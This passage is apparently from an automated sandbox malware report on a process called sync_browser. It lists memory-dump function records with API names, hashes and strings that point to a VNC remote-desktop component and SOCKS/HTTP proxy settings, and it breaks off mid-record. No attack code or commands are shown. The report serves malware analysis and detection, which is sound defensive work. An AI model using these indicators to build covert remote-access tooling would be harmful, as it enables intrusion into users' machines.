                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteObjectfree$CombineCreateOffsetRect
                                                                    • String ID:
                                                                    • API String ID: 960235054-0
                                                                    • Opcode ID: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
                                                                    • Instruction ID: 437db2e74d81f96f5e0c7c006b66ccb406e6f1b9bf36767ca749197aa66a3e15
                                                                    • Opcode Fuzzy Hash: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
                                                                    • Instruction Fuzzy Hash: F3911B36B08A42D6EB20FB66E4546BDB361FB45B88F808031DE5E57B69DE38F505C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
                                                                    • String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
                                                                    • API String ID: 3609861302-2295524587
                                                                    • Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                                    • Instruction ID: 080ffc943205fcdf725973426850840145e683ef4cdbb2f9aef797cfd37a4c7b
                                                                    • Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                                    • Instruction Fuzzy Hash: 18A12F21A0DA82C5FE65BB25A8503B9A2A0BF55784FC84435DA0D577BEEE2CF901C360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo_wsopen_s
                                                                    • String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
                                                                    • API String ID: 2053332431-1561892669
                                                                    • Opcode ID: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                                    • Instruction ID: 9608cebc40cdeeba8892eecf95fc216c8dbca6a2c73becbaec0b51d370174b20
                                                                    • Opcode Fuzzy Hash: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
                                                                    • Instruction Fuzzy Hash: B77187A2E0CA03C5FBBD7A25A9047399A806F55754E984434DE0E067EEDFBCF9408729
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Item$MessageSend$_snprintf$InfoScrollText
                                                                    • String ID: <%s>: $MS Sans Serif
                                                                    • API String ID: 1140286628-959951747
                                                                    • Opcode ID: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                                    • Instruction ID: 2c5e48f8ea8a4f6b1fe1a4742ab6cec79e245cd76c15df89441704c4206ba773
                                                                    • Opcode Fuzzy Hash: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
                                                                    • Instruction Fuzzy Hash: 88917F62A08A55C6F720EF65E8006A973A0FB98B88F904235DE4D17B78DF3CE595C360
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 2315031519-0
                                                                    • Opcode ID: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                                    • Instruction ID: 44fd7cb79945294c0c5d3572861556a9aac282c7a1f629a7197a826fa4ee76bd
                                                                    • Opcode Fuzzy Hash: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
                                                                    • Instruction Fuzzy Hash: 7AB11832A0C652C6E768BF65A49113EF7A0FB84B50F904235E69943BA8DF7CF451DB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
                                                                    • String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
                                                                    • API String ID: 55935355-432259686
                                                                    • Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                    • Instruction ID: 869a646d9ddfba198965b90bdae2c087dccbfce1c7a5b81060ddb663f42e3894
                                                                    • Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                    • Instruction Fuzzy Hash: 2B513D65B0CA83C1EB64BB61B8441B9A3A6BF89744FC44432D54E827B8EF3CF515DB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
                                                                    • String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
                                                                    • API String ID: 3943905059-2958163836
                                                                    • Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                    • Instruction ID: 17348b489c85ccd11cae08e32787e456416b0270a47b10940939d449ab2f7029
                                                                    • Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                    • Instruction Fuzzy Hash: 1C410861A1CA86C2E715BB60E8443EAA369FB84744FC44132DA4D577BDDE3CF14AC760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$Lock$AllocFreemalloc
                                                                    • String ID: Unable to allocate memory in zip dll
                                                                    • API String ID: 105282483-1808592719
                                                                    • Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                    • Instruction ID: b452ac3ce150bd8ace98f5f0d12f6ee0cae7c9696c4967ce897f6b92ffd7d223
                                                                    • Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                    • Instruction Fuzzy Hash: F2714762A0DB42C6EB05BF64E4542B8A3A4FF48B84F844235DE5E473A9DF3CE542C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Delete$Object$CloseDesktopMessagePostRelease
                                                                    • String ID: vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hmemdc$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to DeleteObject$vncdesktop.cpp : failed to close desktop$vncdesktopsink.cpp : ShutdownInitWindowthread
                                                                    • API String ID: 4267955742-668190334
                                                                    • Opcode ID: b1f7d07e1edd3f10dab7f78dec4ede179cd97e7d089ffa8d205f7fdce4919795
                                                                    • Instruction ID: b1117c935d924993f1255af559cafb59da7885beeda5abe110511b45c2a43e7d
                                                                    • Opcode Fuzzy Hash: b1f7d07e1edd3f10dab7f78dec4ede179cd97e7d089ffa8d205f7fdce4919795
                                                                    • Instruction Fuzzy Hash: B2713736A0CA86C4EB24BF61E9446BAA364FF44788F844436DA0D47768CF7CF645E320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 1145045407-2988720461
                                                                    • Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                    • Instruction ID: 6fe1625e78ded9189fce8fd3e50f442f8d6819016b14c19a2500e9aa1c399777
                                                                    • Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                    • Instruction Fuzzy Hash: 9F617132A0C682C5EB20BF21D4402A9A7A4FF48798F844535EA5D4BBADEF7DF545C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CreateTime$CloseHandleSize$CompareMappingView
                                                                    • String ID: c:\video0.dat$c:\video1.dat$videodriver.cpp : Error video.dat
                                                                    • API String ID: 286203867-3102623397
                                                                    • Opcode ID: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                                    • Instruction ID: a19b933aac20da1c49d71b62ad6fb14be7774d33bf6d79f99edb84ce4445611e
                                                                    • Opcode Fuzzy Hash: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
                                                                    • Instruction Fuzzy Hash: D5517021A0DA46C6EA70BB25A504669A391AF85BB4FD40335DE3D07BF8EE3CF545C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
                                                                    • String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
                                                                    • API String ID: 421869683-3362258117
                                                                    • Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                    • Instruction ID: 9411684535f7865a6e6aa20816b38f234847a863b5013594f46040b51bd38d0a
                                                                    • Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                    • Instruction Fuzzy Hash: 2C518231A1CB45C5EB14AF21F8446A9B7A4FF45790F844236EAAD43BA8DF3CE505C760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Object$Select$CreateDelete$BrushClipCompatibleEmptyFileModuleNameRectSolidStretch
                                                                    • String ID: $!
                                                                    • API String ID: 844750580-2056089098
                                                                    • Opcode ID: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                                    • Instruction ID: b35c0fb78b4e3b9bb01b6c4b2021031ab10da3ba8d65ee0cc979c1ea8fb6d032
                                                                    • Opcode Fuzzy Hash: 1a38819b2fb7280654c83d9d129417f0ee9e3dd9bf97b6a7fb9e9e76a124db12
                                                                    • Instruction Fuzzy Hash: 68412B3560C682C6EA65BB11B81477AB7A4FF89B94F844234DD5E47BA8DF3CF4448B20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
